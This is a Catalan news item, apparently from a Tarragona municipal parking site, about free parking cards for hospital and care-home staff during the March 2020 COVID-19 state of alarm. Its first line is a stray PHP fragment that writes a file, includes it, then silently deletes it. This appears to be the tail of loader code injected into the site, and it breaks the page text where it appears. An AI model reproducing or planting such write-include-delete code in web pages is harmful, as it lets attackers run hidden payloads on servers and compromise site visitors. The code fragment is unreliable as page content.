");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> L'Ajuntament de Tarragona ofereix aparcament gratuït als sanitaris
Iconos cabecera

Highlights

  • T-12 CardT-12 Card
    For boys and girls from 4 to 12 years old

L'Ajuntament de Tarragona ofereix aparcament gratuït als sanitaris (30/03/2020)

L’Ajuntament de Tarragona està repartint targetes d’aparcament gratuïtes pel personal d’hospitals i residències de persones grans mentre estigui vigent l’estat d’alarma pel coronavirus. En concret, l’Empresa Municipal d’Aparcaments de Tarragona (AMT) ofereix 50 targetes per al pàrquing municipal Saavedra; 50 per al de l’avinguda Catalunya; 80 per al de Joan XXIII; 80 més per al de Lluís Companys, i 10 per al de Torroja.

Les targetes d’aparcament es distribueixen per al personal sanitari dels hospitals Joan XXIII i Santa Tecla, de la clínica Monegal i les residències de La Mercè, Les Alzines i Sanitas i del sociosanitari del Francolí.

D'altra banda, el consistori agraeix molt l’oferta desinteressada de 50 places als pàrquings de la plaça de la Font i 50 més al de la Rambla Nova (Balcó) per part de l’empresa Pavapark i a l’empresa Interparking, que administra el de la URV-Campus Catalunya, l’oferta iŀlimitada de places.

Font: Ajuntament de Tarragona

L'Ajuntament de Tarragona ofereix aparcament gratuït als sanitaris

[Back to news]

 
Anselm Clavé, 1 43004 - Tarragona